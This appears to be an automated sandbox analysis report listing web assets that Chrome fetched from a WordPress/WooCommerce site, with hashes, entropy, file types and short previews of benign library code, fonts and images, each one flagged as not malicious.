                                                                                                          Preview:!function(){var t={1989:function(t,n,e){var r=e(1789),o=e(401),a=e(7667),c=e(1327),i=e(1866);function u(t){var n=-1,e=null==t?0:t.length;for(this.clear();++n<e;){var r=t[n];this.set(r[0],r[1])}}u.prototype.clear=r,u.prototype.delete=o,u.prototype.get=a,u.prototype.has=c,u.prototype.set=i,t.exports=u},8407:function(t,n,e){var r=e(7040),o=e(4125),a=e(2117),c=e(7518),i=e(4705);function u(t){var n=-1,e=null==t?0:t.length;for(this.clear();++n<e;){var r=t[n];this.set(r[0],r[1])}}u.prototype.clear=r,u.prototype.delete=o,u.prototype.get=a,u.prototype.has=c,u.prototype.set=i,t.exports=u},7071:function(t,n,e){var r=e(852)(e(5639),"Map");t.exports=r},3369:function(t,n,e){var r=e(4785),o=e(1285),a=e(6e3),c=e(9916),i=e(5265);function u(t){var n=-1,e=null==t?0:t.length;for(this.clear();++n<e;){var r=t[n];this.set(r[0],r[1])}}u.prototype.clear=r,u.prototype.delete=o,u.prototype.get=a,u.prototype.has=c,u.prototype.set=i,t.exports=u},2705:function(t,n,e){var r=e(5639).Symbol;t.exports=r},6874:function(
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3129)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):14277
                                                                                                          Entropy (8bit):5.292918573336169
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:xPzCvSMaV0ZATrR09wMmQZcNt3BLQ+Dd9WH+I1wXS0ZgkKtIL2dDmfFVxAVil69k:FzCKMPZATN09o0mtxLbXY+I1rSSdDsFr
                                                                                                          MD5:8690D98E887279F64026F6F97DB7438F
                                                                                                          SHA1:01CB4B5A3F0B9CEE5E36459EEAC2B02C560A19F2
                                                                                                          SHA-256:7755717F7D5E20219FEA67955E1669253F800E5B252E9F16DCC185569AE66882
                                                                                                          SHA-512:90183B42491A4838165B43FCF53C31B7B44E71DD97918D11C0C4CD56E078E8CF69B36E9B662F4AC175245A6D8CEC44FA4EA700F55DEC01F46A9B646496B43B26
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/gtranslate/js/flags.js?ver=6.7.1
                                                                                                          Preview:(function(){. var gt = window.gtranslateSettings || {};. gt = gt[document.currentScript.getAttribute('data-gt-widget-id')] || gt;.. var lang_array_english = {"af":"Afrikaans","sq":"Albanian","am":"Amharic","ar":"Arabic","hy":"Armenian","az":"Azerbaijani","eu":"Basque","be":"Belarusian","bn":"Bengali","bs":"Bosnian","bg":"Bulgarian","ca":"Catalan","ceb":"Cebuano","ny":"Chichewa","zh-CN":"Chinese (Simplified)","zh-TW":"Chinese (Traditional)","co":"Corsican","hr":"Croatian","cs":"Czech","da":"Danish","nl":"Dutch","en":"English","eo":"Esperanto","et":"Estonian","tl":"Filipino","fi":"Finnish","fr":"French","fy":"Frisian","gl":"Galician","ka":"Georgian","de":"German","el":"Greek","gu":"Gujarati","ht":"Haitian Creole","ha":"Hausa","haw":"Hawaiian","iw":"Hebrew","hi":"Hindi","hmn":"Hmong","hu":"Hungarian","is":"Icelandic","ig":"Igbo","id":"Indonesian","ga":"Irish","it":"Italian","ja":"Japanese","jw":"Javanese","kn":"Kannada","kk":"Kazakh","km":"Khmer","ko":"Korean","ku":"Kurdish (Kurm
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (64288)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):374124
                                                                                                          Entropy (8bit):5.38002327405143
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:KAcjJFAkBwH4N0CXH2QDwfGWWDTu4B8GBF93MvbQG32D2allxb:xCn0H4N2GWgB8GBF93Mv0DDpR
                                                                                                          MD5:4C40B91C5E5C8B2AA3A187D8A7FCC634
                                                                                                          SHA1:AA785BB3AD45F71A6C866C4895632B8FA6586E7B
                                                                                                          SHA-256:3DF5391E09EDBBA03D60DA8ED698C0E662DA73A86FCEAE2BFF79AB46ED6FBF6F
                                                                                                          SHA-512:1804A461A690E38156F178D05707EAD70F78A335EAE33677C5C653D5144FB6D220037E85637C8C581D1D00C28C0D23B27C53779949E4C8E8DC73A3AB1EEA7B7D
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!.. - Slider Revolution JavaScript Plugin -............................xXXXXX................................... xXXXXX..xXXXXX..xXXXXX............................xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX...............................xxxxxxxxxxxxxxxxxxx...............................xxxxxxxxxxxxxxxxxxx...............................xxxxxxxxxxxxxxxxxxx.............. DATE: 2021-07-01..@author: Krisztian Horvath, ThemePunch OHG...INTRODUCING GIT.UPDATES AND DOCS AT:.https://www.themepunch.com/support-center..GET LICENSE AT:.https://www.themepunch.com/links/sli
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (64065)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):74131
                                                                                                          Entropy (8bit):5.302888336520099
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:0j7s37GZ2v3hcBMIy3NVc6aBGBokOl/NlRBqAK8m7lLv8qRtnT2H2cURROySp5oC:0z23hrIy3+kOZLk3R5KHQR2n
                                                                                                          MD5:2AEB34B78FC3FB4FF7ED2CE4934169B0
                                                                                                          SHA1:2E034A7F0D0DABD31467A8312C7EE85CAD3E4FF2
                                                                                                          SHA-256:738B1C2950FC6B172FBDAC8007E29EBD840552030251DC7E233F4AF794AA9960
                                                                                                          SHA-512:334DB8CA5B29D2F58E21630B1E3A7ADF0FEAA6DA942E854100117A36678C1E1919701ADF7200C96DB602B2B4A5569285109C66A5EB810B946C136FB0BCF6DDA2
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/select2/select2.full.min.js?ver=4.0.3-wc.6.6.1
                                                                                                          Preview:/*!. * Select2 4.0.3. * https://select2.github.io. *. * Released under the MIT license. * https://github.com/select2/select2/blob/master/LICENSE.md. */.!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?e(require("jquery")):e(jQuery)}(function(t){var e,n,d,s,r,p,h,f,g,m,y,i,o,v,a=((u=t&&t.fn&&t.fn.select2&&t.fn.select2.amd?t.fn.select2.amd:u)&&u.requirejs||(u?n=u:u={},f={},g={},m={},y={},i=Object.prototype.hasOwnProperty,o=[].slice,v=/\.js$/,p=function(e,t){var n,i,o=c(e),s=o[0];return e=o[1],s&&(n=b(s=l(s,t))),s?e=n&&n.normalize?n.normalize(e,(i=t,function(e){return l(e,i)})):l(e,t):(s=(o=c(e=l(e,t)))[0],e=o[1],s&&(n=b(s))),{f:s?s+"!"+e:e,n:e,pr:s,p:n}},h={require:function(e){return w(e)},exports:function(e){var t=f[e];return void 0!==t?t:f[e]={}},module:function(e){return{id:e,uri:"",exports:f[e],config:(t=e,function(){return m&&m.config&&m.config[t]||{}})};var t}},s=function(e,t,n,i){var o,s,r,a,l,c=[],u=typeof n;if(i=i||e,"undefined"==u
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2530)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):223508
                                                                                                          Entropy (8bit):5.553283903932924
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:EhZFrjSUihzAzL0l6RKsRm1t6hTf/9q9bdTOmQyDy4iGNTK:wGUih8siZD989OmQyDy4bm
                                                                                                          MD5:32A28BA95D6B647A7B26C1C6B8C5984B
                                                                                                          SHA1:04532DDAD07F867D18996E04092CCD8D6E92720D
                                                                                                          SHA-256:62E4638CAF9008039E13158D0AE715748C9E7EFE5E557B5B052E4551C6443B14
                                                                                                          SHA-512:0AE3F6AA11E00A5AB4E37DA8F35FF7A4A81D110934FEC71D5DDF07B4DA4F5018FEE907395068AA14DC51B3A927D00BB9F5461F95D35AD19DB9BDB5094A3B9486
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__e"},{"function":"__c","vtp_value":"G-2LEWGZ9NK3"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.affiliation"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.value"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.tax"},{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"ecommerce"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.transaction_id"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.shipping"},{"function":"__jsm","vtp_javascript":["template","(function(){var a=",
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 7680 x 4321, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3409680
                                                                                                          Entropy (8bit):7.75623820947467
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:98304:QEuTL7o3ukyC91Q/BfGg3UATMHP/dSx/YtQBHyjeB4UZkAC9wHhukEy:T3lyC91MfGGTMHXdsZfB4gC9wHYk5
                                                                                                          MD5:DCDBC1199AAECA81C7F2B3FEEC3E0E2C
                                                                                                          SHA1:CD378A53262BB1FCB60D47BF9753AB5BF4BC6E75
                                                                                                          SHA-256:72D29B99579A6FA75CB867FA4F28799A78054F8DBE438FF8E5FE550F250D7565
                                                                                                          SHA-512:B73310C0D27BABFA1B879169AB7B606B1DF4A181ACA409C145472C2B05D69AF57AA13B35BCD85E4350783310F433B92D31D3835048C377AF1625C0FFA4BE1E9F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR.............}..6....pHYs..,J..,J.wztM.. .IDATx...$;v,..Y.._K...u.M/.U...G."Kdgn..0..0.................................................................W..............k..b......#.^g}V.......oMO......Q~..:....\.....#A...5...3...x..z~.........E..._.?...._.....5..l...3...U...._T{...\...|...........~...<.:.s.....iz8..ws.O.p..x..............Y~..E....k...>.........K.KtmF{..oV..m.s..z=W...,.@....8.?`~.9....o..h.vy.....h.g}Q~.=...5....7.U.....N..C.>3... o.......8>Z~........Gh:Uw.....J{*....S..|.........5..?..........=.....du..${..~..{..K...|.px.?..[...#....`........Q.#..0..2~W/..'.U..uL....x...<./...O....0...7....TD2.#..........<...C>.>J{..#.w.?Tw..~.O..|...,........w.....>S^|.~...AO.....,.6.m..1.'...?.....> ......U....x..jx.}........>4.)^..&..7(.'....1..}r<.=..C...o..5......G.'4...M.}^/....).K..}.w.........."r>g..}W.n.Q..R.....q.W.:.yC......hMO......$5.!....@$?.W-_.?...W..(....T.y..e.g{.?\..2=......9...O..cu......8..J..j........79....:.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (7043), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):7043
                                                                                                          Entropy (8bit):4.645957607820541
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:1jHXN5HjRHJNnHKDHJXHasHyBj8nHBH8bNbHlUqrmni4ElJK6XKUlK5859lP5IQL:1TdtjVTHKzJXawyBEleb8apGAHPJ
                                                                                                          MD5:456663A286A204386735FD775542A59E
                                                                                                          SHA1:0A61620B88F4AE0FA7D71E2C7A014EA2C3AB5749
                                                                                                          SHA-256:A7A83E60E7E3B8CADEED69327BA498B4CD68605DB6E408729FA1B946758E7501
                                                                                                          SHA-512:880DC7B615DDC62135595976555F501AF8EA2F1C328B6CBDA1EF656C5D4BE7794AC0ECE5FAF8AE52EFE686C156F1C74646C67DA62D66E7BD88DCB36788860422
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=6.6.1
                                                                                                          Preview::root{--woocommerce:#a46497;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#a46497;--wc-primary-text:white;--wc-secondary:#ebe9eb;--wc-secondary-text:#515151;--wc-highlight:#77a464;--wc-highligh-text:white;--wc-content-bg:#fff;--wc-subtext:#767676}.woocommerce table.shop_table_responsive thead,.woocommerce-page table.shop_table_responsive thead{display:none}.woocommerce table.shop_table_responsive tbody tr:first-child td:first-child,.woocommerce-page table.shop_table_responsive tbody tr:first-child td:first-child{border-top:0}.woocommerce table.shop_table_responsive tbody th,.woocommerce-page table.shop_table_responsive tbody th{display:none}.woocommerce table.shop_table_responsive tr,.woocommerce-page table.shop_table_responsive tr{display:block}.woocommerce table.shop_table_responsive tr td,.woocommerce-page table.shop_table_responsive tr td{display:block;text-align:right!important}.woocommerce table.shop_table_responsive tr td.order-actions,.wooc
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 76764, version 331.-31261
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):76764
                                                                                                          Entropy (8bit):7.996848906523996
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:UOsj0gqVLsxxVegJ1MvhvVpBJoY+q6G9NjFvzOCvXHYVSGhZJZ6xxsBV:UOsj3sVgmoYp6uRvzHYYsZJ+uf
                                                                                                          MD5:F7307680C7FE85959F3ECF122493EA7D
                                                                                                          SHA1:FCE0DA592A3E536D6D5DF5B50CB513398D8C5161
                                                                                                          SHA-256:43C072C16C9EE6D67ACDFA6C6D6685FF1E74EB4237B7CC3C1348AB1C108B26AF
                                                                                                          SHA-512:D115A6F0DF1F766FC83A77ADEFF79DA5B0A463C01C13532CF48F29ED53A0C4EF1D87DB38B8E492FBC3F97A0D192A9A6F636B837E65FCBEAC03BB6F36336CA69E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-brands-400.woff2
                                                                                                          Preview:wOF2......+...........+..K......................?FFTM....`..r.....d....6.$..0..... .....k[.qEa..*v...m.pG......"..9z...8...>....5.B.v....1..........6....G_RA...P.8.a.2r.g....X.u.d..4;.LN..<.. GV..q"."."..........t..!._..!...4...=j.=b?q.lhg.u...I.E...[d8.KY.h......7N.../.?Y...9........l...A..L.$C.%..D.:dJ...ZZgiv7..nLrA...o.k[.E..2S.l..Vp...g..3=...y.e._....% ........k.....w:...P..h......OoH.#&......D...!....s..}......aB...4..(.q....I..z.F(....^;.$.C..L...../.N...G./....O..wQScM..K.fP.....FP..s...`..ZX. ...%.Hj.....X.!V....Q..}..o...b[N4.;`".o.\^.S........D5IM.Bk.}...v...........v.9......j..... %.C'.C;.0...C......*X5k.WDnM...H.AB@Q..1...+...+]f.vJ......p..b..r.:m..b..o)..\.'Mn.dQ-9N2h.3. .X....=....A...4......g...pZ.6W#.7.|...93...u.B^,'.!..Z..P......1...rZu....d.8..+.T.d..h...w.....9..p.Gd...0igw'l.V..].*!.V..A..UDB.IH.lI... ..-.....o.v...cgl..!b...8.;.=~..h@.-.....4a.....G...`...........~..8..L..4I.1.4N|....=\..t}`..X"0|..P......9.EF......
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1665
                                                                                                          Entropy (8bit):4.2829135862996495
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:RMdI2FGs1r+7OGsrq+XEXRGsF7OgkGsLKOCu:edzFGMr+7OGSq+0hGs7ONGCKOCu
                                                                                                          MD5:0B3F95A864BCF6A1F4215D5405CB252C
                                                                                                          SHA1:2014EA5BA49313BC63BD2311A283FB7BB2E93013
                                                                                                          SHA-256:207D9044E5B72E312D09A6004BF10170FE47E38503CC39F5DA517571DEB4B6E9
                                                                                                          SHA-512:DF3466D866A8407A286F4CFC70C7A314F69C9A3DF0E40207B638A9C3CCB38C58670589F03298CA0844B9A8B26FFD80C144FB5267E106A2F2261297827BEC5684
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/by_featured/js/by_featured.js?ver=3.3.0
                                                                                                          Preview:"use strict";..function woof_init_featured() {.. if (icheck_skin != 'none') {.. jQuery('.woof_checkbox_featured').iCheck({. checkboxClass: 'icheckbox_' + icheck_skin.skin + '-' + icheck_skin.color,. });.. jQuery('.woof_checkbox_featured').on('ifChecked', function (event) {. jQuery(this).attr("checked", true);. woof_current_values.product_visibility = 'featured';. woof_ajax_page_num = 1;. if (woof_autosubmit) {. woof_submit_link(woof_get_submit_link());. }. });.. jQuery('.woof_checkbox_featured').on('ifUnchecked', function (event) {. jQuery(this).attr("checked", false);. delete woof_current_values.product_visibility;. woof_ajax_page_num = 1;. if (woof_autosubmit) {. woof_submit_link(woof_get_submit_link());. }. });.. } else {. jQuery('.woof_checkbox_featured').on('change', function (e
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (12198), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):12198
                                                                                                          Entropy (8bit):5.031745242580206
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:GngaW9ELBD26z861V/CvJiVKIsvfT+6EdpEsBpP9Qwo7Q4a99RfuzqXppc4mmm9t:Ggz9kBD26861V/wsVKIsvTEdpEsnmwoz
                                                                                                          MD5:3819C3569DA71DAEC283A75483735F7E
                                                                                                          SHA1:ECD40A5CC6F0B76200C454CA880210DC301CFAB8
                                                                                                          SHA-256:214674CC77ABA35AB3567B88E2739FD08E8E96C61D279559AD61874069683EA0
                                                                                                          SHA-512:2710655DFF46653DAEB3A6E3F6D36F885E51D5B375738EE353ACA40C6F66AE1A7DECE57039D58747012ED9EA2822191143C06F270123B8CC580F6A41B8E8AEF4
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                                                                                                          Preview:!function(){"use strict";function Waypoint(options){if(!options)throw new Error("No options passed to Waypoint constructor");if(!options.element)throw new Error("No element option passed to Waypoint constructor");if(!options.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+keyCounter,this.options=Waypoint.Adapter.extend({},Waypoint.defaults,options),this.element=this.options.element,this.adapter=new Waypoint.Adapter(this.element),this.callback=options.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=Waypoint.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=Waypoint.Context.findOrCreateByElement(this.options.context),Waypoint.offsetAliases[this.options.offset]&&(this.options.offset=Waypoint.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),allWaypoints[this.key]=this,keyCounter+=1}var keyCounter=0,allW
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 20144, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):20144
                                                                                                          Entropy (8bit):7.988855976137295
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:p/Je0pAJ40shogIMZZuf7NA/0wh/zhQktl6k0s:p/JHpl0shorJ4NlhjwS
                                                                                                          MD5:214F75E42AA5CFCA07257CBF8C64E83C
                                                                                                          SHA1:BA4BBE71D4AB266BC145305217CDF86A7777137F
                                                                                                          SHA-256:A6760631FECFE59ED152AEB2C51FDCB515AC00CD4755449016B5B34813735D00
                                                                                                          SHA-512:E8D896C8C3509941FBCE96E2847838A520B3BC8D94348B1121840A1A2A45328BE939238423A03CDFB7823CF128EEC3190DE8B4C1924553D603EF02FA856217E0
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v32/KFOkCnqEu92Fr1Mu51xIIzI.woff2
                                                                                                          Preview:wOF2......N........p..NI.............................Z..|.`..J.R..<.....$..}..Z...x.6.$..0. .... ..D.6..r.L......r.....y.B....(j''.L..)A.1.k...DEHA.O,...@..C;..SE.g.ch.{.t..F...?zW....|.r.p..dO1..-.).Q.9.Z......?v..>......).9@."..\}.(.[....I.u......mc...`...#.[.Q!.%B.("!......``c....._....:.u&~......&'.I.x.>..R.......@.4...]|f9V.u.4v.+...E.~=..{+.....]..&X...L...Z..>O.WH...Z..!.T..:..G..1....2.HR....1...U..N....}.D^.:`E.P.:._~....-Qv.....> .t;..[...B.pE.(T.W1...t.........m.....X..F...]i....$.]..e.VSt.NNo......}.=#.B.0.gds....h...ns.Tv..$<_....2F.Kd.;..\.F......B.p)|.%.<[..YJ..l..CP....F..x{...}...f.&..Ci......;...V............./....w...+.I.B.Y...r.........Q...........X.-cL.g3)...a. ..D..w./x.V...Z.`N.25/..)M&...ys../.{E.ezR:V..2V5.+....;....._.[$*J.r....A0tW.u....L........*&T....~.z........10...3%.`%..urP i.9...M.i4M....L...q...N.........%...w.......?7>.........5.!..|8..."N...Y.....E...M|..._N..v{].._..Ex..J.7....aJ;...#u..W...Sk.9...Vn.]......D..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9141
                                                                                                          Entropy (8bit):5.2975271144294185
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:s6zoFrnW4iaX3LzDk1jpJLB2hlq717+3uClD2tFtJ7bykd+SHS+F:s6Udn3LzoJphH8uClD2tFtJ7byTwtF
                                                                                                          MD5:A8127C1A87BB4F99EDBEEC7C37311DCD
                                                                                                          SHA1:9997A1745F48BDD233DBE9BD8164DAA53EBA105B
                                                                                                          SHA-256:F313D12EA6124BD28FC4A6B7163D253BB83D5AEAB5EDCE594880C5C3DF475CBC
                                                                                                          SHA-512:AA10DDC5B29905C60A058FAED3F5F195F7577CEAC46489E02461B5135732194DAA3AEF4AA473127BF8C753312E02074CFDAC8D0F8F0CC8AA544C7F8E02BEBD08
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! This file is auto-generated */.(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x25]+/,modulo:/^\x25{2}/,placeholder:/^\x25(?:([1-9]\d*)\$|\(([^)]+)\))?(\+)?(0|'[^$])?(-)?(\d+)?(?:\.(\d+))?([b-gijostTuvxX])/,key:/^([a-z_][a-z_\d]*)/i,key_access:/^\.([a-z_][a-z_\d]*)/i,index_access:/^\[(\d+)\]/,sign:/^[+-]/};function a(t){return function(t,e){var r,n,o,s,l,u,p,c,f,d=1,h=t.length,g="";for(n=0;n<h;n++)if("string"==typeof t[n])g+=t[n];else if("object"==typeof t[n]){if((s=t[n]).keys)for(r=e[d],o=0;o<s.keys.length;o++){if(null==r)throw new Error(a('[sprintf] Cannot access property "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i.not_primitive.test(s.type)&&r instanceof Function&&(r=r()),i.numeric_arg.test(s.type)&&"number"!=typeof r&&
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3129)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13536
                                                                                                          Entropy (8bit):5.297596259710546
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:xPzCvSMaV0ZATrR09wMmQZcNt3FaWHd0XS0ZgxKuZwQ9PdDmfFVxZ4HQlbzk:FzCKMPZATN09o0mtVaYdvndDsr2
                                                                                                          MD5:3B9506442F5E9DA937159EC8E978AC92
                                                                                                          SHA1:A065A287369571ADF621A0BE14BB31B2BCEF194C
                                                                                                          SHA-256:B9BDD9C21F6B831230A5EDCD3C073F310BC4C518097ADB15FC50BD25E3343E2B
                                                                                                          SHA-512:630DED7A1FC798BA19516F2E66DC58D37364EC14501B6C24B5B7DF085DB4B7B86DB1C9EC1740C1D375027E59B7D2F9A00BF960F0E630D034221E1B3388CDDBFF
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:(function(){. var gt = window.gtranslateSettings || {};. gt = gt[document.currentScript.getAttribute('data-gt-widget-id')] || gt;.. var lang_array_english = {"af":"Afrikaans","sq":"Albanian","am":"Amharic","ar":"Arabic","hy":"Armenian","az":"Azerbaijani","eu":"Basque","be":"Belarusian","bn":"Bengali","bs":"Bosnian","bg":"Bulgarian","ca":"Catalan","ceb":"Cebuano","ny":"Chichewa","zh-CN":"Chinese (Simplified)","zh-TW":"Chinese (Traditional)","co":"Corsican","hr":"Croatian","cs":"Czech","da":"Danish","nl":"Dutch","en":"English","eo":"Esperanto","et":"Estonian","tl":"Filipino","fi":"Finnish","fr":"French","fy":"Frisian","gl":"Galician","ka":"Georgian","de":"German","el":"Greek","gu":"Gujarati","ht":"Haitian Creole","ha":"Hausa","haw":"Hawaiian","iw":"Hebrew","hi":"Hindi","hmn":"Hmong","hu":"Hungarian","is":"Icelandic","ig":"Igbo","id":"Indonesian","ga":"Irish","it":"Italian","ja":"Japanese","jw":"Javanese","kn":"Kannada","kk":"Kazakh","km":"Khmer","ko":"Korean","ku":"Kurdish (Kurm
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65493)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):132804
                                                                                                          Entropy (8bit):5.111206986028066
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:QhLOaWbzhwMQU1nTVPhEhcHqkeSYPEMqIjZBywdIAm6YIzo+ajpy4UX8ulaij86Q:l3yxWNVNlx7gdBaL
                                                                                                          MD5:5B957A80A02395D0183527BDA5A86E64
                                                                                                          SHA1:4D985B49A7AB3953DFF5355ECAC6885E97D40CED
                                                                                                          SHA-256:7EC7AC5F949B4D6F1DD313C062EC21769E446BCB17FEC74ACE339C3BCC8FAF94
                                                                                                          SHA-512:338AFE13694BD05E2FDC59A36983C5CF036FACC76B2C4F0294BFED9412B89E79B711F28B24C76746A4B9A10F14AE58219D94D5E589D517A8A6F7D411E3E34C53
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! elementor-pro - v3.6.4 - 15-03-2022 */."use strict";(self.webpackChunkelementor_pro=self.webpackChunkelementor_pro||[]).push([[995,26,534,369,804,888,680,121,288,42,50,985,287,824,58,114,443,838,685,858,102,1,124,859,979,497],{9978:(e,t,s)=>{var n=s(7914),i=n(s(5574)),o=n(s(9743)),r=n(s(8102)),a=n(s(585)),l=n(s(9086)),d=n(s(1559)),c=n(s(9937)),h=n(s(7317)),m=n(s(2140)),u=n(s(6484)),p=n(s(6208)),g=n(s(8746)),f=n(s(1060)),v=n(s(3334)),_=n(s(5475)),S=n(s(224)),y=n(s(7318));const extendDefaultHandlers=e=>({...e,...{animatedText:i.default,carousel:o.default,countdown:r.default,form:a.default,gallery:l.default,hotspot:d.default,lottie:c.default,nav_menu:h.default,popup:m.default,posts:u.default,share_buttons:p.default,slides:g.default,social:f.default,themeBuilder:_.default,themeElements:S.default,woocommerce:y.default,tableOfContents:v.default}});elementorProFrontend.on("elementor-pro/modules/init:before",(()=>{elementorFrontend.hooks.addFilter("elementor-pro/frontend/handlers",extendDe
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (5552)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):72593
                                                                                                          Entropy (8bit):5.332700741129292
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:RJeUwT7hpwPCHM9ZVK01QYTZ02LKVsdmpyKdcicIF:RIT7Vs9ZVKBYj8wKdcHIF
                                                                                                          MD5:AAA706A00E7F15E53E03D39B4045A294
                                                                                                          SHA1:A4EE1013A0308037E0DEE7466ECD0F47301FA6C9
                                                                                                          SHA-256:1DB36C3CA34D615BBA7204EB6293655D4A1BE76BC6072D10A43EFA2F56E3CA58
                                                                                                          SHA-512:AB808E2BFDFF8871955B9944CD3A702DCCF7235C9944D89CED05A8E6132A0511505312D43C0BE0B1577E8BFA923D2985EEAFA41D8828533A73364A4944E1C652
                                                                                                          Malicious:false
                                                                                                          Reputation:low
